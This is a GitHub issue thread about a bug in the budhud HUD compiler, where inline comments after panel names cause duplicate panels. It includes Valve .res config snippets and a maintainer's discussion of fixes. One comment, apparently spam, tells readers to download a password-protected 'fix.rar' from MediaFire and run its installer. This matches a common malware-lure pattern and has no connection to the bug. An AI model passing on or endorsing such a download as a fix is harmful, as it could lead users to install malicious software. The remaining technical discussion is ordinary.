### ISSUE TITLE
Compiler issue: duplicate panels

### ISSUE THREAD

**Issue by qkeitoe** [rbjaxter/budhud#536]
A comment on the same line as a panel name, for example: https://github.com/rbjaxter/budhud/blob/946b22f04995fcb5c072f23f425b3960c369bf64/_budhud/resource/ui/econ/confirmdialog.res#L67-L69 causes the compiler to generate duplicate panels:
```
...

"Resource/UI/ConfirmDialog.res"
{
    ...

    "ExplanationLabel"
    {
        "wide"                                                      "280"
        "tall"                                                      "60"
        "fgcolor_override"                                          "bh_blank"
        "font"                                                      "bh_Font12"
    }

    ...

    "explanationlabel"
    {
        "ControlName"                                               "CExLabel"
        "fieldName"                                                 "ExplanationLabel"
        "font"                                                      "EconFontSmall"
        "labelText"                                                 "%text%"
        "textAlignment"                                             "north"
        "xpos"                                                      "40"
        "ypos"                                                      "50"
        "zpos"                                                      "1"
        "wide"                                                      "244"
        "tall"                                                      "170"
        "autoResize"                                                "0"
        "pinCorner"                                                 "0"
        "visible"                                                   "1"
        "enabled"                                                   "1"
        "centerwrap"                                                "1"
        "fgcolor_override"                                          "200 80 60 255"
    }
}
```
As a result, after compilation you can see the following:

| <img src="https://github.com/user-attachments/assets/0e95c63f-0f98-4fb8-b76f-c462446faf79" width="100%" /> | <img src="https://github.com/user-attachments/assets/1f189bfa-5506-480e-bf3d-77d9864420f3" width="100%" /> | <img src="https://github.com/user-attachments/assets/2ac82905-1a05-422e-8a07-b4b434492c5e" width="100%" /> |
|-|-|-|

Another example (couldn't take a screenshot): https://github.com/rbjaxter/budhud/blob/946b22f04995fcb5c072f23f425b3960c369bf64/_budhud/resource/ui/econ/genericnotificationtoastmainmenu.res#L40-L42
```
...

"Resource/UI/GenericNotificationToast.res"
{
    ...

    "AvatarImage"
    {
        "ypos"                                                      "15"
        "wide"                                                      "24"
        "tall"                                                      "24"
    }

    "avatarimage"
    {
        "ControlName"                                               "CAvatarImagePanel"
        "fieldName"                                                 "AvatarImage"
        "xpos"                                                      "9"
        "ypos"                                                      "9"
        "zpos"                                                      "0"
        "wide"                                                      "32"
        "tall"                                                      "32"
        "visible"                                                   "1"
        "enabled"                                                   "1"
        "image"                                                     ""
        "scaleImage"                                                "1"
        "color_outline"                                             "52 48 45 255"
    }
}
```

Deleting/relocating such comments resolves the issue.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rbjaxter** [comment]
This is an issue that would ideally be addressed by changes to the compiler, however the original person who made it is unable to do so. I'm kinda hesitant to have to go back through all file comments and adjust them, so I'll have to think on it a bit I guess. Maybe there's not as many as I anticipate

**Comment by qkeitoe** [comment]
I agree that this issue is a issue on the compiler side. But for the reason you mentioned, and, moreover, since the compiler repo fork you made has the feature to open issues disabled, I addressed this issue here.

Btw, you can easily find all of them by searching for `^\s*“\S*”\s*//`. There are about 30 in the `_budhud` folder, and about 60 in the `_tf2hud` folder. I guess the ones in the `_tf2hud` folder can be easily and safely removed using regex.

**Comment by rbjaxter** [comment]
Just going to leave the "Need Help" tag on for now, someone would basically need to edit the code for the compiler here (which would be the best solution): https://github.com/rbjaxter/budhud-compiler

i could also just remove comments but I'm still fairly opposed to that approach
